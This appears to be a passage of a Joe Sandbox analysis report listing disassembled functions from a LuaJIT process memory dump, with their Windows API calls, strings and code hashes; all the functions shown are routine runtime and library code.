Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E82472

Strings

p, xrefs: 00007FF677E824F3
p, xrefs: 00007FF677E8256B
f, xrefs: 00007FF677E82563
-, xrefs: 00007FF677E824D7

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$f$p$p
API String ID: 3215553584-2516539321
Opcode ID: 6d9718cc4aaba9d1bb1b069d4f507f805525112df42b78793867432a1c80f7ac
Instruction ID: 5a0eb8d3b8ed4fec03a7a28ab592df7b326d160e134418e1cb4db3246c08adbd
Opcode Fuzzy Hash: 6d9718cc4aaba9d1bb1b069d4f507f805525112df42b78793867432a1c80f7ac
Instruction Fuzzy Hash: DA12C623E2C24386FF249B19D05427976A9FB80760F986232EEE9C76C4DF3CE5809745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E9F550 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF677E9F581
GetLastError.KERNEL32 ref: 00007FF677E9F58D
CloseHandle.KERNEL32 ref: 00007FF677E9F5A5
CreateFileW.KERNEL32 ref: 00007FF677E9F5D0
WriteConsoleW.KERNEL32 ref: 00007FF677E9F5EF

Strings

CONOUT$, xrefs: 00007FF677E9F5B1

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 2726d88a7a3e12e43dc10a873b8cbe2ff6c834c430beca4be323d9c6aa3b38c2
Instruction ID: 6f0547ca02e765d72ce0a3b1eb351c65eb0401d8c2a876cfdb0b78e9724892a9
Opcode Fuzzy Hash: 2726d88a7a3e12e43dc10a873b8cbe2ff6c834c430beca4be323d9c6aa3b38c2
Instruction Fuzzy Hash: 59117927A28A8182E3508B56A85433977B4FB98BE5F104234EE1DC77A8CF3CD9448740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677DFD3C0 Relevance: 9.1, APIs: 6, Instructions: 76COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF677DFD413
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF677DFD42E
RtlVirtualUnwind.KERNEL32 ref: 00007FF677DFD473
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF677DFD493
RtlRestoreContext.KERNEL32 ref: 00007FF677DFD4D0
RaiseException.KERNEL32 ref: 00007FF677DFD512

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ContextEntryFunctionLookup$CaptureExceptionRaiseRestoreUnwindVirtual
String ID:
API String ID: 2358177407-0
Opcode ID: 050ec86600a775e1ba4a6fe656570c8a09b9775de57354fe22a5cd9ab7a00de7
Instruction ID: 07b6ce31e0976085cbf1deb8f1a759741fb03cbbafe0bb4bf9e1fdedc079a3b8
Opcode Fuzzy Hash: 050ec86600a775e1ba4a6fe656570c8a09b9775de57354fe22a5cd9ab7a00de7
Instruction Fuzzy Hash: C8312A37628A8582EB609F15F4943EAB371FB88744F580536DE8D43A58DE3DE559CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E20360 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

%lf, xrefs: 00007FF677E20439
too many arguments, xrefs: 00007FF677E203BD

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: %lf$too many arguments
API String ID: 3215553584-3990051606
Opcode ID: 6914881ddc5360937c0fc87212d53d73bd0b64e47b61ffbcc14248390cfb5a9d
Instruction ID: 56aecd334fd64ff6ea96a9583bc534d0d46b4913b8a405e43b701e9bfb398e62
Opcode Fuzzy Hash: 6914881ddc5360937c0fc87212d53d73bd0b64e47b61ffbcc14248390cfb5a9d
Instruction Fuzzy Hash: 10812923B2CA5746EA20DB26A49027E7391FF89BA4F604635DE5D87BD2DE3CE4418740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E27780 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF677E4B5F8

Strings

cannot resolve symbol '%s': %s, xrefs: 00007FF677E4B7A3

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast
String ID: cannot resolve symbol '%s': %s
API String ID: 1452528299-2703306267
Opcode ID: 382eec8f84f59ebd06732b4d299ee1a21e2cab44a48f18aa93b05172692188d4
Instruction ID: c591dc744f533efdf7a97fce92bb98d524fe62e663dd292240d406e417b3ca37
Opcode Fuzzy Hash: 382eec8f84f59ebd06732b4d299ee1a21e2cab44a48f18aa93b05172692188d4
Instruction Fuzzy Hash: 5B7106A7A28B8286DB10CB69C4842A97760FB45BD4F148732EF6D877D5EE3CE491C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7FFB0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF677E80013
_set_statfp.LIBCMT ref: 00007FF677E80037

Strings

cosh, xrefs: 00007FF677E80076
", xrefs: 00007FF677E80094

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _set_statfp
String ID: "$cosh
API String ID: 1156100317-3800341493
Opcode ID: 3527226068fc837922194fe3f66ab0bd93b502f46f543947ad2714f2ced6d2c8
Instruction ID: edfe05376709fe522d2d5d02cf80c8cee71ef050145f39b688860caaa6f85b62
Opcode Fuzzy Hash: 3527226068fc837922194fe3f66ab0bd93b502f46f543947ad2714f2ced6d2c8
Instruction Fuzzy Hash: 4A813A32D38F8589D6638B3494513B673A8AF6A3D5F119337E99E71A61DF2CA1C28700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8D184 Relevance: 7.7, APIs: 5, Instructions: 202COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E8D1C6
GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143,?,?,FFFFFFFE,00007FF677E8D536), ref: 00007FF677E8D284
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143,?,?,FFFFFFFE,00007FF677E8D536), ref: 00007FF677E8D30E

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: db66fc161205daab70daedc293a48d686f5db1f4363fab8ee29e9db382aab8e0
Instruction ID: 72eb07a70b0bd9565f5d52ccb5b849a51c6db7b19ef46b88f7f72a3dd45c26f1
Opcode Fuzzy Hash: db66fc161205daab70daedc293a48d686f5db1f4363fab8ee29e9db382aab8e0
Instruction Fuzzy Hash: 45819D23E3861289FB11DB65D8406BC27A1BB59B98F446136DE0EE3696DF3CE461C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E90078 Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF677E900B4
_set_statfp.LIBCMT ref: 00007FF677E900D2
_set_statfp.LIBCMT ref: 00007FF677E900FB
_set_statfp.LIBCMT ref: 00007FF677E902B4

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 8e49d4906af4448fee86808fa03185cee9d90748d49e94bab1f9cfc244d0afb8
Instruction ID: 62a070df62c9876e79cdf9c0fc49e673d6db8a15d097ccd471f7fb5d3cd5a36c
Opcode Fuzzy Hash: 8e49d4906af4448fee86808fa03185cee9d90748d49e94bab1f9cfc244d0afb8
Instruction Fuzzy Hash: D051FB23D38A47C5F7629F3998503B6A360BF60364F548235ED5EEA6D1EF3CA4818E01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8FC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF677E8FC48
_set_statfp.LIBCMT ref: 00007FF677E8FC63
_set_statfp.LIBCMT ref: 00007FF677E8FC7F
_set_statfp.LIBCMT ref: 00007FF677E8FCBB

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
Instruction ID: 111ab9e9b67a02f827ba236adf01c6ef143c382763b201cf4fdbd19de23443ce
Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
Instruction Fuzzy Hash: 32118263E7CA0345F6941378E4563B912406FB83B0F182E35EE6ED67D6CE1CAA405208

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8DB98 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E8DE41

Part of subcall function 00007FF677E9B4D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E9B4ED

Strings

UTF-16LEUNICODE, xrefs: 00007FF677E8DDE5
UTF-8, xrefs: 00007FF677E8DDC4
ccs, xrefs: 00007FF677E8DD8D

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4f9e3838f21cefc3d5966103b1e640b5c5c53066c6e52fbd7bfed03ace8eac49
Instruction ID: eacb447c1e551acdcb8670ee83e7af67c65061c011b232418df7b8ca75e58f49
Opcode Fuzzy Hash: 4f9e3838f21cefc3d5966103b1e640b5c5c53066c6e52fbd7bfed03ace8eac49
Instruction Fuzzy Hash: F481D333D2C24285F779CF2882543792BA1DF1A748F55B136CE0DC72E5DE2DA8219742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E65330 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E65367
_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E653A1

Strings

, xrefs: 00007FF677E65570
*, xrefs: 00007FF677E65506

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: b7f3ad1c86d270a42b928145908bb2c1d0f59c70e6619d8ec3eb18c94a12e33f
Instruction ID: 145c6f7ab9c1d5273f6eb94f5e0f4c276f1f2f8096dde30dae52bb092d502dc2
Opcode Fuzzy Hash: b7f3ad1c86d270a42b928145908bb2c1d0f59c70e6619d8ec3eb18c94a12e33f
Instruction Fuzzy Hash: 2A816573B6C3468AEB649F25844817C3BA2EB15B48F580136DF89C629DEF3DE641CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E6611C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E6615F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E663AD

Strings

, xrefs: 00007FF677E6616B
*, xrefs: 00007FF677E662D5

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 750f9bbf5b9275a15d53bdc89c7c19f80ffebf2ce48f309f2496a6267291e29c
Instruction ID: d53495fa8d200858e061b003b8f727e0d4a0881846793bd19cf5b1654a0377d9
Opcode Fuzzy Hash: 750f9bbf5b9275a15d53bdc89c7c19f80ffebf2ce48f309f2496a6267291e29c
Instruction Fuzzy Hash: EF816D7397824286EBA49F29804417C7BB0EB91B4CF58013ACF89C6295EF3DEA85C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7FAE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF677E7FB38

Strings

", xrefs: 00007FF677E7FBA5
sinh, xrefs: 00007FF677E7FB86

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _set_statfp
String ID: "$sinh
API String ID: 1156100317-1232919748
Opcode ID: 17ece3eff11d6790b94e8039b0ad0c70cbfcb95e3acb92d2298369319c5b4b9e
Instruction ID: 834a7d1d18e506cd8b4b7daf7463b7f62a77bfa9cf2d3d7cd74a1c11f751480a
Opcode Fuzzy Hash: 17ece3eff11d6790b94e8039b0ad0c70cbfcb95e3acb92d2298369319c5b4b9e
Instruction Fuzzy Hash: A5917532D38F8588D6638B3494513B57368AF6A3D5F119327E98EB1A66DF2CA1838740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7F624 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF677E7F6CF

Strings

acos, xrefs: 00007FF677E7F6E2
!, xrefs: 00007FF677E7F704

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _set_statfp
String ID: !$acos
API String ID: 1156100317-2870037509
Opcode ID: f44279ad54ed9413e535f5ad7b6d347ef0614247c92ddb48b13714c85f7291af
Instruction ID: ba29a038cd0e37a3b7fc126486fa0810c99305c121d915ef26b4352692e6803d
Opcode Fuzzy Hash: f44279ad54ed9413e535f5ad7b6d347ef0614247c92ddb48b13714c85f7291af
Instruction Fuzzy Hash: 0F619423D3CF4589E663CB7458102769764AFA7390F129337ED5EB5A65DF2CE0838640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7F398 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF677E7F43B

Strings

!, xrefs: 00007FF677E7F470
asin, xrefs: 00007FF677E7F44E

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _set_statfp
String ID: !$asin
API String ID: 1156100317-2188059690
Opcode ID: 3d9322a4b1b119b62eaaf1bc541914b4da9db28d46a8c0720257969e86701752
Instruction ID: 79cedd083ea83ec955599cd6f0154334e048289d479d40763f7ddc8687444b76
Opcode Fuzzy Hash: 3d9322a4b1b119b62eaaf1bc541914b4da9db28d46a8c0720257969e86701752
Instruction Fuzzy Hash: 7051A433D38F8589E613CB749811276A764BFA7390F12C336ED5EB5A61DF2DA0838640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E4B6A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32 ref: 00007FF677E4B6BE
GetProcAddress.KERNEL32 ref: 00007FF677E4B6DA
GetProcAddress.KERNEL32 ref: 00007FF677E4B717
SetLastError.KERNEL32 ref: 00007FF677E4B724

Strings

user32.dll, xrefs: 00007FF677E4B6A9

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: user32.dll
API String ID: 856020675-38312619
Opcode ID: d0a447769f4203c1c1ff5813a9cc4a8c19414c44417825eb213b033d19d625ae
Instruction ID: a1f01e01cc336649df3718f7909918cb4a73e4aadcc65225ff59a765f80971aa
Opcode Fuzzy Hash: d0a447769f4203c1c1ff5813a9cc4a8c19414c44417825eb213b033d19d625ae
Instruction Fuzzy Hash: 4B21C027A29B9182EB518B58E49027977A0FF46BC4F158831DE8D87754EF3CD492D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E4B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32 ref: 00007FF677E4B6BE
GetProcAddress.KERNEL32 ref: 00007FF677E4B6DA
GetProcAddress.KERNEL32 ref: 00007FF677E4B717
SetLastError.KERNEL32 ref: 00007FF677E4B724

Strings

kernel32.dll, xrefs: 00007FF677E4B6A0

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: kernel32.dll
API String ID: 856020675-1793498882
Opcode ID: 05a99b42ff93bcaa22d00b3a9d340ded0e84e891b7f32cb1ea37d2acedc0f622
Instruction ID: aa54d7cf53ffc0db881dfb46e75e226db4c7b12b0ceea27a1504e17c51fd5b4d
Opcode Fuzzy Hash: 05a99b42ff93bcaa22d00b3a9d340ded0e84e891b7f32cb1ea37d2acedc0f622
Instruction Fuzzy Hash: 7F21C027A29B9182EB518B58E48027977A0FF46BC4F158831DE8D87754EF3CD4A2D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E4B6B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32 ref: 00007FF677E4B6BE
GetProcAddress.KERNEL32 ref: 00007FF677E4B6DA
GetProcAddress.KERNEL32 ref: 00007FF677E4B717
SetLastError.KERNEL32 ref: 00007FF677E4B724

Strings

gdi32.dll, xrefs: 00007FF677E4B6B2

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: gdi32.dll
API String ID: 856020675-1341420408
Opcode ID: 54be177f07439a90ac0b1cc8f290a3c846ebbfb6d3545252ada49246a09b7657
Instruction ID: 8f91b7a0712ffabb9f37df03075e6d845d43562f29c112e6d12ae0f3c57e8e33
Opcode Fuzzy Hash: 54be177f07439a90ac0b1cc8f290a3c846ebbfb6d3545252ada49246a09b7657
Instruction Fuzzy Hash: 5011C027A29B8182EB018B58E48427977A0FF45BC4F158831DE8D87754EF3CD492C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E91D90 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E91DD1
